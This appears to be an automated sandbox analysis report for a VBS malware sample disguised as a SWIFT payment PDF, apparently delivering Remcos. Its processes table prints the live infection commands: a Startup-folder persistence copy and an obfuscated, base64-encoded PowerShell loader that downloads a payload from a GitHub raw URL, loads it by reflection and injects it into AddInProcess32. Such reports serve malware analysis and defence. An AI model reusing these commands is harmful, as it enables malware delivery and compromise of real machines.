Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
SWIFT 103 202406111301435660 110624-pdf.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0xb1e5c325, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ifvlxbh.5u0.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5avviu1a.yux.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kveck0rz.0zi.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s3iz5jqp.rtb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vxrxvq1y.b0m.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yatzni5m.cvg.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 08:33:59 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 08:33:59 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 08:33:59 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 08:33:59 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 08:33:59 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
||
|
Chrome Cache Entry: 182
|
PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 183
|
PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 184
|
JSON data
|
dropped
|
||
|
Chrome Cache Entry: 185
|
PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 186
|
ASCII text, with very long lines (46884)
|
dropped
|
||
|
Chrome Cache Entry: 187
|
HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
|
downloaded
|
||
|
Chrome Cache Entry: 188
|
ASCII text, with no line terminators
|
downloaded
|
||
|
Chrome Cache Entry: 189
|
ASCII text, with very long lines (65410)
|
dropped
|
||
|
Chrome Cache Entry: 190
|
JSON data
|
dropped
|
||
|
Chrome Cache Entry: 191
|
JSON data
|
dropped
|
||
|
Chrome Cache Entry: 192
|
ASCII text, with very long lines (65410)
|
downloaded
|
||
|
Chrome Cache Entry: 193
|
SVG Scalable Vector Graphics image
|
dropped
|
||
|
Chrome Cache Entry: 194
|
JSON data
|
downloaded
|
||
|
Chrome Cache Entry: 195
|
JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94,
resolutionunit=2], baseline, precision 8, 1000x300, components 3
|
downloaded
|
||
|
Chrome Cache Entry: 196
|
ASCII text, with CRLF line terminators
|
downloaded
|
||
|
Chrome Cache Entry: 197
|
PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 198
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
Chrome Cache Entry: 199
|
Web Open Font Format (Version 2), TrueType, length 19360, version 1.0
|
downloaded
|
||
|
Chrome Cache Entry: 200
|
ASCII text, with very long lines (52717), with no line terminators
|
dropped
|
||
|
Chrome Cache Entry: 201
|
ASCII text, with very long lines (52717), with no line terminators
|
downloaded
|
||
|
Chrome Cache Entry: 202
|
exported SGML document, ASCII text, with very long lines (65536), with no line terminators
|
downloaded
|
||
|
Chrome Cache Entry: 203
|
JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94,
resolutionunit=2], baseline, precision 8, 1000x300, components 3
|
dropped
|
||
|
Chrome Cache Entry: 204
|
PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 205
|
MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
|
downloaded
|
||
|
Chrome Cache Entry: 206
|
JSON data
|
dropped
|
||
|
Chrome Cache Entry: 207
|
MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
|
dropped
|
||
|
Chrome Cache Entry: 208
|
PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 209
|
ASCII text, with very long lines (32271), with no line terminators
|
dropped
|
||
|
Chrome Cache Entry: 210
|
JSON data
|
downloaded
|
||
|
Chrome Cache Entry: 211
|
PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 212
|
ASCII text, with very long lines (46884)
|
downloaded
|
||
|
Chrome Cache Entry: 213
|
JSON data
|
downloaded
|
||
|
Chrome Cache Entry: 214
|
JSON data
|
dropped
|
||
|
Chrome Cache Entry: 215
|
exported SGML document, ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
|
Chrome Cache Entry: 216
|
ASCII text, with very long lines (65536), with no line terminators
|
downloaded
|
||
|
Chrome Cache Entry: 217
|
ASCII text, with very long lines (32271), with no line terminators
|
downloaded
|
||
|
Chrome Cache Entry: 218
|
PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 219
|
PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 220
|
JSON data
|
dropped
|
||
|
Chrome Cache Entry: 221
|
JSON data
|
downloaded
|
||
|
Chrome Cache Entry: 222
|
SVG Scalable Vector Graphics image
|
downloaded
|
||
|
Chrome Cache Entry: 223
|
PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
|
dropped
|
There are 51 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SWIFT 103 202406111301435660 110624-pdf.vbs"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT
103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup\ sbv.etirenrew.vbs')')
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping 127.0.0.1 -n 10
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\'
+ [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')')
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JigodkFSaWFiTGUgJypNZFIqJykubmFtZVszLDExLDJdLUpPaW4nJykgKCAoJ3UnKycwRHUnKydybCcrJyA9IEonKydodWh0dHBzJysnOi8nKycvcmEnKyd3LmdpJysndGh1YicrJ3VzZScrJ3Jjb250ZW50JysnLicrJ2NvJysnbS9Ob0RldGVjdE8nKyduLycrJ05vRGV0ZScrJ2MnKyd0T24vJysncmVmJysncycrJy9oJysnZWEnKydkcy9tYWluJysnLycrJ0RldGFoTm8nKyd0aC1WLnR4JysndEonKydodTsgdTBEYicrJ2FzZTY0Q29udGUnKydudCA9ICcrJyhOZXctT2JqZScrJ2N0IFN5cycrJ3RlbS5OZXQuV2ViJysnQ2xpJysnZScrJ250KScrJy5Eb3dubG9hZFN0JysncicrJ2luZyh1MEQnKyd1cmwpOyB1MCcrJ0RiaScrJ25hJysncicrJ3lDb250ZW50JysnID0gW1N5cycrJ3QnKydlJysnbS4nKydDbycrJ24nKyd2JysnZScrJ3InKyd0XScrJzo6RicrJ3JvbUJhc2U2NFN0cmknKyduZycrJyh1MERiYXNlJysnNjRDb250ZScrJ250KTsgJysndScrJzBEYXNzJysnZW1ibHknKycgPSBbUmVmbCcrJ2VjJysndGlvbi5BJysnc3NlbWInKydsJysneV0nKyc6OkwnKydvYScrJ2QnKycoJysndTAnKydEYicrJ2luJysnYScrJ3J5QycrJ29udCcrJ2VudCknKyc7IFtkbmxpYi5JJysnTycrJy5IbycrJ21lXTo6VkEnKydJJysnKGQ2ZzAnKycvJysnTycrJ1lVJysnbFgvZC9lZScrJy5ldHNhcC8vOnNwJysndHRoZCcrJzYnKydnLCBkJysnNmdkZXNhJysndCcrJ2l2JysnYScrJ2RvZDZnJysnLCBkJysnNmcnKydkZScrJ3NhdCcrJ2l2JysnYWRvJysnZDYnKydnLCAnKydkNmdkZXMnKydhdGl2YWRvZDZnJysnLCBkJysnNicrJ2dBZGRJJysnbicrJ1ByJysnb2NlcycrJ3MzMicrJ2Q2ZywgZDYnKydnZDZnJysnLGQnKyc2Z2Q2JysnZyknKS5yRXBsQUNlKCd1MEQnLCckJykuckVwbEFDZSgoW2NIYVJdNzQrW2NIYVJdMTA0K1tjSGFSXTExNyksW1NUckluZ11bY0hhUl0zOSkuckVwbEFDZSgnZDZnJyxbU1RySW5nXVtjSGFSXTM0KSk=';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"&((vARiabLe '*MdR*').name[3,11,2]-JOin'') ( ('u'+'0Du'+'rl'+' = J'+'huhttps'+':/'+'/ra'+'w.gi'+'thub'+'use'+'rcontent'+'.'+'co'+'m/NoDetectO'+'n/'+'NoDete'+'c'+'tOn/'+'ref'+'s'+'/h'+'ea'+'ds/main'+'/'+'DetahNo'+'th-V.tx'+'tJ'+'hu;
u0Db'+'ase64Conte'+'nt = '+'(New-Obje'+'ct Sys'+'tem.Net.Web'+'Cli'+'e'+'nt)'+'.DownloadSt'+'r'+'ing(u0D'+'url); u0'+'Dbi'+'na'+'r'+'yContent'+'
= [Sys'+'t'+'e'+'m.'+'Co'+'n'+'v'+'e'+'r'+'t]'+'::F'+'romBase64Stri'+'ng'+'(u0Dbase'+'64Conte'+'nt); '+'u'+'0Dass'+'embly'+'
= [Refl'+'ec'+'tion.A'+'ssemb'+'l'+'y]'+'::L'+'oa'+'d'+'('+'u0'+'Db'+'in'+'a'+'ryC'+'ont'+'ent)'+'; [dnlib.I'+'O'+'.Ho'+'me]::VA'+'I'+'(d6g0'+'/'+'O'+'YU'+'lX/d/ee'+'.etsap//:sp'+'tthd'+'6'+'g,
d'+'6gdesa'+'t'+'iv'+'a'+'dod6g'+', d'+'6g'+'de'+'sat'+'iv'+'ado'+'d6'+'g, '+'d6gdes'+'ativadod6g'+', d'+'6'+'gAddI'+'n'+'Pr'+'oces'+'s32'+'d6g,
d6'+'gd6g'+',d'+'6gd6'+'g)').rEplACe('u0D','$').rEplACe(([cHaR]74+[cHaR]104+[cHaR]117),[STrIng][cHaR]39).rEplACe('d6g',[STrIng][cHaR]34))"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\SysWOW64\svchost.exe
|
svchost.exe
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
|
|
|
C:\Windows\SysWOW64\svchost.exe
|
svchost.exe
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\SysWOW64\svchost.exe
|
svchost.exe
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\SysWOW64\svchost.exe
|
svchost.exe
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\SysWOW64\svchost.exe
|
svchost.exe
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\SysWOW64\svchost.exe
|
svchost.exe
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\SysWOW64\svchost.exe
|
svchost.exe
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\SysWOW64\svchost.exe
|
svchost.exe
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\SysWOW64\svchost.exe
|
svchost.exe
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\SysWOW64\svchost.exe
|
svchost.exe
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\SysWOW64\svchost.exe
|
svchost.exe
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\SysWOW64\svchost.exe
|
svchost.exe
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\SysWOW64\svchost.exe
|
svchost.exe
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=2360,i,8934632438909745951,2213681595228066499,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2020,i,18065770690636922477,5919200967098741641,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1180,i,15662417021116800271,17959301878097503911,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1968,i,15358586014354363738,1738356423128360891,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2000,i,16637610320917934916,565223346788031028,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1184,i,1130476888448619373,4472464422477594584,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2004,i,2937470017902191409,5218832269953484114,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2008,i,16121129215091139583,4677272960365539008,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2008,i,16982306025501434778,10627650727957162702,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2008,i,18146508179752881524,919200875560916846,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2008,i,15823624400460166783,6536935139452576376,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1964,i,5440842566350035257,10787203092068946937,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2032,i,11553977204438472227,7445186355205850417,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1988,i,7374315475741238408,2210743874770523791,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2000,i,3916554340437548015,1500443498568681016,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
